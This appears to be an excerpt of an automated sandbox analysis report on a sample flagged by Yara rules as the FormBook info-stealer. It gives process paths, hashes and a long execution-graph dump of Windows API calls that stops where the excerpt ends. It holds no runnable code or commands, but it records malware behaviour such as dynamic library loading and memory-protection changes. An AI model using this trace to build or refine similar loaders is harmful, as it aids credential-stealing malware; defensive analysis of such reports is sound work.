                                                                                  Target ID:5
                                                                                  Start time:03:54:50
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe"
                                                                                  Imagebase:0x90000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:03:55:03
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff7191e0000
                                                                                  File size:597'432 bytes
                                                                                  MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:19.6%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:18.4%
                                                                                    Total number of Nodes:1610
                                                                                    Total number of Limit Nodes:40
                                                                                    execution_graph 5292 402643 5293 402672 5292->5293 5294 402657 5292->5294 5296 4026a2 5293->5296 5297 402677 5293->5297 5295 402d89 21 API calls 5294->5295 5305 40265e 5295->5305 5298 402dab 21 API calls 5296->5298 5299 402dab 21 API calls 5297->5299 5300 4026a9 lstrlenW 5298->5300 5301 40267e 5299->5301 5300->5305 5309 406543 WideCharToMultiByte 5301->5309 5303 402692 lstrlenA 5303->5305 5304 4026ec 5305->5304 5307 4060f2 5 API calls 5305->5307 5308 4026d6 5305->5308 5306 4060c3 WriteFile 5306->5304 5307->5308 5308->5304 5308->5306 5309->5303 5310 6fe210e1 5313 6fe21111 5310->5313 5311 6fe212b0 GlobalFree 5312 6fe21240 GlobalFree 5312->5313 5313->5311 5313->5312 5314 6fe211d7 GlobalAlloc 5313->5314 5315 6fe212ab 5313->5315 5316 6fe2135a 2 API calls 5313->5316 5317 6fe2129a GlobalFree 5313->5317 5318 6fe21312 2 API calls 5313->5318 5319 6fe2116b GlobalAlloc 5313->5319 5320 6fe21381 lstrcpyW 5313->5320 5314->5313 5315->5311 5316->5313 5317->5313 5318->5313 5319->5313 5320->5313 4538 401946 4539 401948 4538->4539 4540 402dab 21 API calls 4539->4540 4541 40194d 4540->4541 4544 405c2d 4541->4544 4583 405ef8 4544->4583 4547 405c55 DeleteFileW 4549 401956 4547->4549 4548 405c6c 4550 405d97 4548->4550 4597 406521 lstrcpynW 4548->4597 4550->4549 4557 40687e 2 API calls 4550->4557 4552 405c92 4553 405ca5 4552->4553 4554 405c98 lstrcatW 4552->4554 4598 405e3c lstrlenW 4553->4598 4555 405cab 4554->4555 4558 405cbb lstrcatW 4555->4558 4560 405cc6 lstrlenW FindFirstFileW 4555->4560 4559 405db1 4557->4559 4558->4560 4559->4549 4561 405db5 4559->4561 4563 405d8c 4560->4563 4565 405ce8 4560->4565 4615 405df0 lstrlenW CharPrevW 4561->4615 4563->4550 4566 405d6f FindNextFileW 4565->4566 4576 405c2d 64 API calls 4565->4576 4578 4055a6 28 API calls 4565->4578 4581 4055a6 28 API calls 4565->4581 4602 406521 lstrcpynW 4565->4602 4603 405be5 4565->4603 4611 4062e1 MoveFileExW 4565->4611 4566->4565 4570 405d85 FindClose 4566->4570 4567 405be5 5 API calls 4569 405dc7 4567->4569 4571 405de1 4569->4571 4572 405dcb 4569->4572 4570->4563 4574 4055a6 28 API calls 4571->4574 4572->4549 4575 4055a6 28 API calls 4572->4575 4574->4549 4577 405dd8 4575->4577 4576->4565 4579 4062e1 40 API calls 4577->4579 4578->4566 4580 405ddf 4579->4580 4580->4549 4581->4565 4618 406521 lstrcpynW 4583->4618 4585 405f09 4619 405e9b CharNextW CharNextW 4585->4619 4588 405c4d 4588->4547 4588->4548 4589 4067cf 5 API calls 4595 405f1f 4589->4595 4590 405f50 lstrlenW 4591 405f5b 4590->4591 4590->4595 4592 405df0 3 API calls 4591->4592 4594 405f60 GetFileAttributesW 4592->4594 4593 40687e 2 API calls 4593->4595 4594->4588 4595->4588 4595->4590 4595->4593 4596 405e3c 2 API calls 4595->4596 4596->4590 4597->4552 4599 405e4a 4598->4599 4600 405e50 CharPrevW 4599->4600 4601 405e5c 4599->4601 4600->4599 4600->4601 4601->4555 4602->4565 4625 405fec GetFileAttributesW 4603->4625 4606 405c12 4606->4565 4607 405c00 RemoveDirectoryW 4609 405c0e 4607->4609 4608 405c08 DeleteFileW 4608->4609 4609->4606 4610 405c1e SetFileAttributesW 4609->4610 4610->4606 4612 406302 4611->4612 4613 4062f5 4611->4613 4612->4565 4628 406167 4613->4628 4616 405dbb 4615->4616 4617 405e0c lstrcatW 4615->4617 4616->4567 4617->4616 4618->4585 4620 405eb8 4619->4620 4621 405eca 4619->4621 4620->4621 4622 405ec5 CharNextW 4620->4622 4623 405e1d CharNextW 4621->4623 4624 405eee 4621->4624 4622->4624 4623->4621 4624->4588 4624->4589 4626 405bf1 4625->4626 4627 405ffe SetFileAttributesW 4625->4627 4626->4606 4626->4607 4626->4608 4627->4626 4629 406197 4628->4629 4630 4061bd GetShortPathNameW 4628->4630 4655 406011 GetFileAttributesW CreateFileW 4629->4655 4632 4061d2 4630->4632 4633 4062dc 4630->4633 4632->4633 4635 4061da wsprintfA 4632->4635 4633->4612 4634 4061a1 CloseHandle GetShortPathNameW 4634->4633 4636 4061b5 4634->4636 4637 40655e 21 API calls 4635->4637 4636->4630 4636->4633 4638 406202 4637->4638 4656 406011 GetFileAttributesW CreateFileW 4638->4656 4640 40620f 4640->4633 4641 40621e GetFileSize GlobalAlloc 4640->4641 4642 406240 4641->4642 4643 4062d5 CloseHandle 4641->4643 4657 406094 ReadFile 4642->4657 4643->4633 4648 406273 4651 405f76 4 API calls 4648->4651 4649 40625f lstrcpyA 4650 406281 4649->4650 4652 4062b8 SetFilePointer 4650->4652 4651->4650 4664 4060c3 WriteFile 4652->4664 4655->4634 4656->4640 4658 4060b2 4657->4658 4658->4643 4659 405f76 lstrlenA 4658->4659 4660 405fb7 lstrlenA 4659->4660 4661 405f90 lstrcmpiA 4660->4661 4663 405fbf 4660->4663 4662 405fae CharNextA 4661->4662 4661->4663 4662->4660 4663->4648 4663->4649 4665 4060e1 GlobalFree 4664->4665 4665->4643 4666 4015c6 4667 402dab 21 API calls 4666->4667 4668 4015cd 4667->4668 4669 405e9b 4 API calls 4668->4669 4682 4015d6 4669->4682 4670 401636 4672 40163b 4670->4672 4674 401668 4670->4674 4671 405e1d CharNextW 4671->4682 4691 401423 4672->4691 4675 401423 28 API calls 4674->4675 4681 401660 4675->4681 4680 40164f SetCurrentDirectoryW 4680->4681 4682->4670 4682->4671 4683 40161c GetFileAttributesW 4682->4683 4685 405aec 4682->4685 4688 405a75 CreateDirectoryW 4682->4688 4695 405acf CreateDirectoryW 4682->4695 4683->4682 4686 406915 5 API calls 4685->4686 4687 405af3 4686->4687 4687->4682 4689 405ac1 4688->4689 4690 405ac5 GetLastError 4688->4690 4689->4682 4690->4689 4692 4055a6 28 API calls 4691->4692 4693 401431 4692->4693 4694 406521 lstrcpynW 4693->4694 4694->4680 4696 405ae3 GetLastError 4695->4696 4697 405adf 4695->4697 4696->4697 4697->4682 5321 401c48 5322 402d89 21 API calls 5321->5322 5323 401c4f 5322->5323 5324 402d89 21 API calls 5323->5324 5325 401c5c 5324->5325 5326 401c71 5325->5326 5327 402dab 21 API calls 5325->5327 5328 401c81 5326->5328 5329 402dab 21 API calls 5326->5329 5327->5326 5330 401cd8 5328->5330 5331 401c8c 5328->5331 5329->5328 5333 402dab 21 API calls 5330->5333 5332 402d89 21 API calls 5331->5332 5334 401c91 5332->5334 5335 401cdd 5333->5335 5336 402d89 21 API calls 5334->5336 5337 402dab 21 API calls 5335->5337 5338 401c9d 5336->5338 5339 401ce6 FindWindowExW 5337->5339 5340 401cc8 SendMessageW 5338->5340 5341 401caa SendMessageTimeoutW 5338->5341 5342 401d08 5339->5342 5340->5342 5341->5342 5350 4028c9 5351 4028cf 5350->5351 5352 4028d7 FindClose 5351->5352 5353 402c2f 5351->5353 5352->5353 5354 40494a 5355 404980 5354->5355 5356 40495a 5354->5356 5358 404507 8 API calls 5355->5358 5357 4044a0 22 API calls 5356->5357 5359 404967 SetDlgItemTextW 5357->5359 5360 40498c 5358->5360 5359->5355 5361 6fe223e9 5362 6fe22453 5361->5362 5363 6fe2245e GlobalAlloc 5362->5363 5364 6fe2247d 5362->5364 5363->5362 5368 4016d1 5369 402dab 21 API calls 5368->5369 5370 4016d7 GetFullPathNameW 5369->5370 5371 4016f1 5370->5371 5372 401713 5370->5372 5371->5372 5375 40687e 2 API calls 5371->5375 5373 401728 GetShortPathNameW 5372->5373 5374 402c2f 5372->5374 5373->5374 5376 401703 5375->5376 5376->5372 5378 406521 lstrcpynW 5376->5378 5378->5372 5379 401e53 GetDC 5380 402d89 21 API calls 5379->5380 5381 401e65 GetDeviceCaps MulDiv ReleaseDC 5380->5381 5382 402d89 21 API calls 5381->5382 5383 401e96 5382->5383 5384 40655e 21 API calls 5383->5384 5385 401ed3 CreateFontIndirectW 5384->5385 5386 40263d 5385->5386 5387 402955 5388 402dab 21 API calls 5387->5388 5389 402961 5388->5389 5390 402977 5389->5390 5391 402dab 21 API calls 5389->5391 5392 405fec 2 API calls 5390->5392 5391->5390 5393 40297d 5392->5393 5415 406011 GetFileAttributesW CreateFileW 5393->5415 5395 40298a 5396 402a40 5395->5396 5397 4029a5 GlobalAlloc 5395->5397 5398 402a28 5395->5398 5399 402a47 DeleteFileW 5396->5399 5400 402a5a 5396->5400 5397->5398 5401 4029be 5397->5401 5402 4032b9 39 API calls 5398->5402 5399->5400 5416 4034b4 SetFilePointer 5401->5416 5404 402a35 CloseHandle 5402->5404 5404->5396 5405 4029c4 5406 40349e ReadFile 5405->5406 5407 4029cd GlobalAlloc 5406->5407 5408 402a11 5407->5408 5409 4029dd 5407->5409 5410 4060c3 WriteFile 5408->5410 5411 4032b9 39 API calls 5409->5411 5412 402a1d GlobalFree 5410->5412 5414 4029ea 5411->5414 5412->5398 5413 402a08 GlobalFree 5413->5408 5414->5413 5415->5395 5416->5405 5417 6fe21774 5418 6fe217a3 5417->5418 5419 6fe21bff 22 API calls 5418->5419 5420 6fe217aa 5419->5420 5421 6fe217b1 5420->5421 5422 6fe217bd 5420->5422 5423 6fe21312 2 API calls 5421->5423 5424 6fe217c7 5422->5424 5425 6fe217e4 5422->5425 5433 6fe217bb 5423->5433 5428 6fe215dd 3 API calls 5424->5428 5426 6fe217ea 5425->5426 5427 6fe2180e 5425->5427 5429 6fe21654 3 API calls 5426->5429 5430 6fe215dd 3 API calls 5427->5430 5431 6fe217cc 5428->5431 5432 6fe217ef 5429->5432 5430->5433 5434 6fe21654 3 API calls 5431->5434 5435 6fe21312 2 API calls 5432->5435 5436 6fe217d2 5434->5436 5437 6fe217f5 GlobalFree 5435->5437 5438 6fe21312 2 API calls 5436->5438 5437->5433 5440 6fe21809 GlobalFree 5437->5440 5439 6fe217d8 GlobalFree 5438->5439 5439->5433 5440->5433 5441 4045d6 lstrcpynW lstrlenW 4821 4014d7 4822 402d89 21 API calls 4821->4822 4823 4014dd Sleep 4822->4823 4825 402c2f 4823->4825 5442 40195b 5443 402dab 21 API calls 5442->5443 5444 401962 lstrlenW 5443->5444 5445 40263d 5444->5445 5446 6fe21979 5447 6fe2199c 5446->5447 5448 6fe219e3 5447->5448 5449 6fe219d1 GlobalFree 5447->5449 5450 6fe21312 2 API calls 5448->5450 5449->5448 5451 6fe21b6e GlobalFree GlobalFree 5450->5451 5095 4020dd 5096 4020ef 5095->5096 5106 4021a1 5095->5106 5097 402dab 21 API calls 5096->5097 5099 4020f6 5097->5099 5098 401423 28 API calls 5100 4022fb 5098->5100 5101 402dab 21 API calls 5099->5101 5102 4020ff 5101->5102 5103 402115 LoadLibraryExW 5102->5103 5104 402107 GetModuleHandleW 5102->5104 5105 402126 5103->5105 5103->5106 5104->5103 5104->5105 5118 406984 5105->5118 5106->5098 5109 402170 5111 4055a6 28 API calls 5109->5111 5110 402137 5112 402156 5110->5112 5113 40213f 5110->5113 5114 402147 5111->5114 5123 6fe21817 5112->5123 5115 401423 28 API calls 5113->5115 5114->5100 5116 402193 FreeLibrary 5114->5116 5115->5114 5116->5100 5165 406543 WideCharToMultiByte 5118->5165 5120 4069a1 5121 4069a8 GetProcAddress 5120->5121 5122 402131 5120->5122 5121->5122 5122->5109 5122->5110 5124 6fe2184a 5123->5124 5166 6fe21bff 5124->5166 5126 6fe21851 5127 6fe21976 5126->5127 5128 6fe21862 5126->5128 5129 6fe21869 5126->5129 5127->5114 5216 6fe2243e 5128->5216 5200 6fe22480 5129->5200 5134 6fe2188e 5135 6fe218af 5134->5135 5136 6fe218cd 5134->5136 5229 6fe22655 5135->5229 5141 6fe218d3 5136->5141 5142 6fe2191e 5136->5142 5137 6fe21898 5137->5134 5226 6fe22e23 5137->5226 5138 6fe2187f 5140 6fe21885 5138->5140 5146 6fe21890 5138->5146 5140->5134 5210 6fe22b98 5140->5210 5248 6fe21666 5141->5248 5144 6fe22655 10 API calls 5142->5144 5149 6fe2190f 5144->5149 5145 6fe218b5 5240 6fe21654 5145->5240 5220 6fe22810 5146->5220 5156 6fe21965 5149->5156 5254 6fe22618 5149->5254 5154 6fe21896 5154->5134 5155 6fe22655 10 API calls 5155->5149 5156->5127 5158 6fe2196f GlobalFree 5156->5158 5158->5127 5162 6fe21951 5162->5156 5258 6fe215dd wsprintfW 5162->5258 5163 6fe2194a FreeLibrary 5163->5162 5165->5120 5261 6fe212bb GlobalAlloc 5166->5261 5168 6fe21c26 5262 6fe212bb GlobalAlloc 5168->5262 5170 6fe21e6b GlobalFree GlobalFree GlobalFree 5171 6fe21e88 5170->5171 5182 6fe21ed2 5170->5182 5173 6fe2227e 5171->5173 5179 6fe21e9d 5171->5179 5171->5182 5172 6fe21d26 GlobalAlloc 5192 6fe21c31 5172->5192 5174 6fe222a0 GetModuleHandleW 5173->5174 5173->5182 5175 6fe222b1 LoadLibraryW 5174->5175 5176 6fe222c6 5174->5176 5175->5176 5175->5182 5269 6fe216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5176->5269 5177 6fe21d71 lstrcpyW 5181 6fe21d7b lstrcpyW 5177->5181 5178 6fe21d8f GlobalFree 5178->5192 5179->5182 5265 6fe212cc 5179->5265 5181->5192 5182->5126 5183 6fe22318 5183->5182 5187 6fe22325 lstrlenW 5183->5187 5184 6fe22126 5268 6fe212bb GlobalAlloc 5184->5268 5270 6fe216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5187->5270 5188 6fe22067 GlobalFree 5188->5192 5189 6fe221ae 5189->5182 5197 6fe22216 lstrcpyW 5189->5197 5190 6fe222d8 5190->5183 5198 6fe22302 GetProcAddress 5190->5198 5192->5170 5192->5172 5192->5177 5192->5178 5192->5181 5192->5182 5192->5184 5192->5188 5192->5189 5193 6fe21dcd 5192->5193 5195 6fe212cc 2 API calls 5192->5195 5193->5192 5263 6fe2162f GlobalSize GlobalAlloc 5193->5263 5194 6fe2233f 5194->5182 5195->5192 5197->5182 5198->5183 5199 6fe2212f 5199->5126 5202 6fe22498 5200->5202 5201 6fe212cc GlobalAlloc lstrcpynW 5201->5202 5202->5201 5204 6fe225c1 GlobalFree 5202->5204 5205 6fe22540 GlobalAlloc WideCharToMultiByte 5202->5205 5206 6fe2256b GlobalAlloc CLSIDFromString 5202->5206 5208 6fe2258a 5202->5208 5272 6fe2135a 5202->5272 5204->5202 5207 6fe2186f 5204->5207 5205->5204 5206->5204 5207->5134 5207->5137 5207->5138 5208->5204 5276 6fe227a4 5208->5276 5212 6fe22baa 5210->5212 5211 6fe22c4f VirtualAlloc 5215 6fe22c6d 5211->5215 5212->5211 5214 6fe22d39 5214->5134 5279 6fe22b42 5215->5279 5217 6fe22453 5216->5217 5218 6fe2245e GlobalAlloc 5217->5218 5219 6fe21868 5217->5219 5218->5217 5219->5129 5224 6fe22840 5220->5224 5221 6fe228db GlobalAlloc 5225 6fe228fe 5221->5225 5222 6fe228ee 5223 6fe228f4 GlobalSize 5222->5223 5222->5225 5223->5225 5224->5221 5224->5222 5225->5154 5227 6fe22e2e 5226->5227 5228 6fe22e6e GlobalFree 5227->5228 5283 6fe212bb GlobalAlloc 5229->5283 5231 6fe226fa StringFromGUID2 5237 6fe2265f 5231->5237 5232 6fe2270b lstrcpynW 5232->5237 5233 6fe226d8 MultiByteToWideChar 5233->5237 5234 6fe2271e wsprintfW 5234->5237 5235 6fe22742 GlobalFree 5235->5237 5236 6fe22777 GlobalFree 5236->5145 5237->5231 5237->5232 5237->5233 5237->5234 5237->5235 5237->5236 5238 6fe21312 2 API calls 5237->5238 5284 6fe21381 5237->5284 5238->5237 5288 6fe212bb GlobalAlloc 5240->5288 5242 6fe21659 5243 6fe21666 2 API calls 5242->5243 5244 6fe21663 5243->5244 5245 6fe21312 5244->5245 5246 6fe21355 GlobalFree 5245->5246 5247 6fe2131b GlobalAlloc lstrcpynW 5245->5247 5246->5149 5247->5246 5249 6fe2169f lstrcpyW 5248->5249 5250 6fe21672 wsprintfW 5248->5250 5253 6fe216b8 5249->5253 5250->5253 5253->5155 5255 6fe22626 5254->5255 5256 6fe21931 5254->5256 5255->5256 5257 6fe22642 GlobalFree 5255->5257 5256->5162 5256->5163 5257->5255 5259 6fe21312 2 API calls 5258->5259 5260 6fe215fe 5259->5260 5260->5156 5261->5168 5262->5192 5264 6fe2164d 5263->5264 5264->5193 5271 6fe212bb GlobalAlloc 5265->5271 5267 6fe212db lstrcpynW 5267->5182 5268->5199 5269->5190 5270->5194 5271->5267 5273 6fe21361 5272->5273 5274 6fe212cc 2 API calls 5273->5274 5275 6fe2137f 5274->5275 5275->5202 5277 6fe227b2 VirtualAlloc 5276->5277 5278 6fe22808 5276->5278 5277->5278 5278->5208 5280 6fe22b4d 5279->5280 5281 6fe22b52 GetLastError 5280->5281 5282 6fe22b5d 5280->5282 5281->5282 5282->5214 5283->5237 5285 6fe2138a 5284->5285 5286 6fe213ac 5284->5286 5285->5286 5287 6fe21390 lstrcpyW 5285->5287 5286->5237 5287->5286 5288->5242 5289 6fe22a7f 5290 6fe22acf 5289->5290 5291 6fe22a8f VirtualProtect 5289->5291 5291->5290 5452 402b5e 5453 402bb0 5452->5453 5454 402b65 5452->5454 5455 406915 5 API calls 5453->5455 5456 402d89 21 API calls 5454->5456 5458 402bae 5454->5458 5457 402bb7 5455->5457 5459 402b73 5456->5459 5460 402dab 21 API calls 5457->5460 5462 402d89 21 API calls 5459->5462 5461 402bc0 5460->5461 5461->5458 5463 402bc4 IIDFromString 5461->5463 5465 402b7f 5462->5465 5463->5458 5464 402bd3 5463->5464 5464->5458 5470 406521 lstrcpynW 5464->5470 5469 406468 wsprintfW 5465->5469 5467 402bf0 CoTaskMemFree 5467->5458 5469->5458 5470->5467 5478 40465f 5479 404677 5478->5479 5485 404791 5478->5485 5486 4044a0 22 API calls 5479->5486 5480 4047fb 5481 4048c5 5480->5481 5482 404805 GetDlgItem 5480->5482 5487 404507 8 API calls 5481->5487 5483 404886 5482->5483 5484 40481f 5482->5484 5483->5481 5491 404898 5483->5491 5484->5483 5490 404845 SendMessageW LoadCursorW SetCursor 5484->5490 5485->5480 5485->5481 5488 4047cc GetDlgItem SendMessageW 5485->5488 5489 4046de 5486->5489 5501 4048c0 5487->5501 5511 4044c2 KiUserCallbackDispatcher 5488->5511 5493 4044a0 22 API calls 5489->5493 5515 40490e 5490->5515 5496 4048ae 5491->5496 5497 40489e SendMessageW 5491->5497 5494 4046eb CheckDlgButton 5493->5494 5509 4044c2 KiUserCallbackDispatcher 5494->5509 5496->5501 5502 4048b4 SendMessageW 5496->5502 5497->5496 5498 4047f6 5512 4048ea 5498->5512 5502->5501 5504 404709 GetDlgItem 5510 4044d5 SendMessageW 5504->5510 5506 40471f SendMessageW 5507 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5506->5507 5508 40473c GetSysColor 5506->5508 5507->5501 5508->5507 5509->5504 5510->5506 5511->5498 5513 4048f8 5512->5513 5514 4048fd SendMessageW 5512->5514 5513->5514 5514->5480 5518 405b47 ShellExecuteExW 5515->5518 5517 404874 LoadCursorW SetCursor 5517->5483 5518->5517 5519 402a60 5520 402d89 21 API calls 5519->5520 5521 402a66 5520->5521 5522 402aa9 5521->5522 5523 402a8d 5521->5523 5532 402933 5521->5532 5524 402ac3 5522->5524 5525 402ab3 5522->5525 5528 402a92 5523->5528 5529 402aa3 5523->5529 5527 40655e 21 API calls 5524->5527 5526 402d89 21 API calls 5525->5526 5526->5532 5527->5532 5533 406521 lstrcpynW 5528->5533 5534 406468 wsprintfW 5529->5534 5533->5532 5534->5532 4300 401761 4306 402dab 4300->4306 4304 40176f 4305 406040 2 API calls 4304->4305 4305->4304 4307 402db7 4306->4307 4308 40655e 21 API calls 4307->4308 4309 402dd8 4308->4309 4310 401768 4309->4310 4311 4067cf 5 API calls 4309->4311 4312 406040 4310->4312 4311->4310 4313 40604d GetTickCount GetTempFileNameW 4312->4313 4314 406087 4313->4314 4315 406083 4313->4315 4314->4304 4315->4313 4315->4314 5535 6fe22d43 5536 6fe22d5b 5535->5536 5537 6fe2162f 2 API calls 5536->5537 5538 6fe22d76 5537->5538 5539 401d62 5540 402d89 21 API calls 5539->5540 5541 401d73 SetWindowLongW 5540->5541 5542 402c2f 5541->5542 4425 401ee3 4433 402d89 4425->4433 4427 401ee9 4428 402d89 21 API calls 4427->4428 4429 401ef5 4428->4429 4430 401f01 ShowWindow 4429->4430 4431 401f0c EnableWindow 4429->4431 4432 402c2f 4430->4432 4431->4432 4434 40655e 21 API calls 4433->4434 4435 402d9e 4434->4435 4435->4427 5543 4028e3 5544 4028eb 5543->5544 5545 4028ef FindNextFileW 5544->5545 5547 402901 5544->5547 5546 402948 5545->5546 5545->5547 5549 406521 lstrcpynW 5546->5549 5549->5547 4482 4056e5 4483 405706 GetDlgItem GetDlgItem GetDlgItem 4482->4483 4484 40588f 4482->4484 4528 4044d5 SendMessageW 4483->4528 4486 4058c0 4484->4486 4487 405898 GetDlgItem CreateThread CloseHandle 4484->4487 4488 4058eb 4486->4488 4490 405910 4486->4490 4491 4058d7 ShowWindow ShowWindow 4486->4491 4487->4486 4531 405679 OleInitialize 4487->4531 4492 4058f7 4488->4492 4493 40594b 4488->4493 4489 405776 4498 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4489->4498 4497 404507 8 API calls 4490->4497 4530 4044d5 SendMessageW 4491->4530 4495 405925 ShowWindow 4492->4495 4496 4058ff 4492->4496 4493->4490 4501 405959 SendMessageW 4493->4501 4504 405945 4495->4504 4505 405937 4495->4505 4502 404479 SendMessageW 4496->4502 4503 40591e 4497->4503 4499 4057eb 4498->4499 4500 4057cf SendMessageW SendMessageW 4498->4500 4506 4057f0 SendMessageW 4499->4506 4507 4057fe 4499->4507 4500->4499 4501->4503 4508 405972 CreatePopupMenu 4501->4508 4502->4490 4510 404479 SendMessageW 4504->4510 4509 4055a6 28 API calls 4505->4509 4506->4507 4512 4044a0 22 API calls 4507->4512 4511 40655e 21 API calls 4508->4511 4509->4504 4510->4493 4513 405982 AppendMenuW 4511->4513 4514 40580e 4512->4514 4515 4059b2 TrackPopupMenu 4513->4515 4516 40599f GetWindowRect 4513->4516 4517 405817 ShowWindow 4514->4517 4518 40584b GetDlgItem SendMessageW 4514->4518 4515->4503 4519 4059cd 4515->4519 4516->4515 4520 40583a 4517->4520 4521 40582d ShowWindow 4517->4521 4518->4503 4522 405872 SendMessageW SendMessageW 4518->4522 4523 4059e9 SendMessageW 4519->4523 4529 4044d5 SendMessageW 4520->4529 4521->4520 4522->4503 4523->4523 4524 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4523->4524 4526 405a2b SendMessageW 4524->4526 4526->4526 4527 405a54 GlobalUnlock SetClipboardData CloseClipboard 4526->4527 4527->4503 4528->4489 4529->4518 4530->4488 4532 4044ec SendMessageW 4531->4532 4536 40569c 4532->4536 4533 4056c3 4534 4044ec SendMessageW 4533->4534 4535 4056d5 OleUninitialize 4534->4535 4536->4533 4537 401389 2 API calls 4536->4537 4537->4536 5550 404ce7 5551 404d13 5550->5551 5552 404cf7 5550->5552 5553 404d46 5551->5553 5554 404d19 SHGetPathFromIDListW 5551->5554 5561 405b65 GetDlgItemTextW 5552->5561 5557 404d30 SendMessageW 5554->5557 5558 404d29 5554->5558 5556 404d04 SendMessageW 5556->5551 5557->5553 5559 40140b 2 API calls 5558->5559 5559->5557 5561->5556 5562 401568 5563 402ba9 5562->5563 5566 406468 wsprintfW 5563->5566 5565 402bae 5566->5565 5567 40196d 5568 402d89 21 API calls 5567->5568 5569 401974 5568->5569 5570 402d89 21 API calls 5569->5570 5571 401981 5570->5571 5572 402dab 21 API calls 5571->5572 5573 401998 lstrlenW 5572->5573 5574 4019a9 5573->5574 5575 4019ea 5574->5575 5579 406521 lstrcpynW 5574->5579 5577 4019da 5577->5575 5578 4019df lstrlenW 5577->5578 5578->5575 5579->5577 5580 40166f 5581 402dab 21 API calls 5580->5581 5582 401675 5581->5582 5583 40687e 2 API calls 5582->5583 5584 40167b 5583->5584 5585 402af0 5586 402d89 21 API calls 5585->5586 5587 402af6 5586->5587 5588 402933 5587->5588 5589 40655e 21 API calls 5587->5589 5589->5588 4714 4026f1 4715 402d89 21 API calls 4714->4715 4724 402700 4715->4724 4716 40283d 4717 40274a ReadFile 4717->4716 4717->4724 4718 4027e3 4718->4716 4718->4724 4728 4060f2 SetFilePointer 4718->4728 4719 406094 ReadFile 4719->4724 4721 40278a MultiByteToWideChar 4721->4724 4722 40283f 4737 406468 wsprintfW 4722->4737 4724->4716 4724->4717 4724->4718 4724->4719 4724->4721 4724->4722 4725 4027b0 SetFilePointer MultiByteToWideChar 4724->4725 4726 402850 4724->4726 4725->4724 4726->4716 4727 402871 SetFilePointer 4726->4727 4727->4716 4729 40610e 4728->4729 4730 406126 4728->4730 4731 406094 ReadFile 4729->4731 4730->4718 4732 40611a 4731->4732 4732->4730 4733 406157 SetFilePointer 4732->4733 4734 40612f SetFilePointer 4732->4734 4733->4730 4734->4733 4735 40613a 4734->4735 4736 4060c3 WriteFile 4735->4736 4736->4730 4737->4716 4738 401774 4739 402dab 21 API calls 4738->4739 4740 40177b 4739->4740 4741 4017a3 4740->4741 4742 40179b 4740->4742 4800 406521 lstrcpynW 4741->4800 4799 406521 lstrcpynW 4742->4799 4745 4017ae 4747 405df0 3 API calls 4745->4747 4746 4017a1 4749 4067cf 5 API calls 4746->4749 4748 4017b4 lstrcatW 4747->4748 4748->4746 4760 4017c0 4749->4760 4750 40687e 2 API calls 4750->4760 4751 4017fc 4753 405fec 2 API calls 4751->4753 4753->4760 4754 4017d2 CompareFileTime 4754->4760 4755 401892 4756 4055a6 28 API calls 4755->4756 4759 40189c 4756->4759 4757 4055a6 28 API calls 4767 40187e 4757->4767 4758 406521 lstrcpynW 4758->4760 4778 4032b9 4759->4778 4760->4750 4760->4751 4760->4754 4760->4755 4760->4758 4764 40655e 21 API calls 4760->4764 4774 405b81 MessageBoxIndirectW 4760->4774 4776 401869 4760->4776 4777 406011 GetFileAttributesW CreateFileW 4760->4777 4763 4018c3 SetFileTime 4765 4018d5 CloseHandle 4763->4765 4764->4760 4766 4018e6 4765->4766 4765->4767 4768 4018eb 4766->4768 4769 4018fe 4766->4769 4770 40655e 21 API calls 4768->4770 4771 40655e 21 API calls 4769->4771 4772 4018f3 lstrcatW 4770->4772 4773 401906 4771->4773 4772->4773 4773->4767 4775 405b81 MessageBoxIndirectW 4773->4775 4774->4760 4775->4767 4776->4757 4776->4767 4777->4760 4780 4032d2 4778->4780 4779 4032fd 4801 40349e 4779->4801 4780->4779 4811 4034b4 SetFilePointer 4780->4811 4784 40331a GetTickCount 4795 40332d 4784->4795 4785 40343e 4786 403442 4785->4786 4790 40345a 4785->4790 4788 40349e ReadFile 4786->4788 4787 4018af 4787->4763 4787->4765 4788->4787 4789 40349e ReadFile 4789->4790 4790->4787 4790->4789 4792 4060c3 WriteFile 4790->4792 4791 40349e ReadFile 4791->4795 4792->4790 4794 403393 GetTickCount 4794->4795 4795->4787 4795->4791 4795->4794 4796 4033bc MulDiv wsprintfW 4795->4796 4798 4060c3 WriteFile 4795->4798 4804 406a90 4795->4804 4797 4055a6 28 API calls 4796->4797 4797->4795 4798->4795 4799->4746 4800->4745 4802 406094 ReadFile 4801->4802 4803 403308 4802->4803 4803->4784 4803->4785 4803->4787 4805 406ab5 4804->4805 4808 406abd 4804->4808 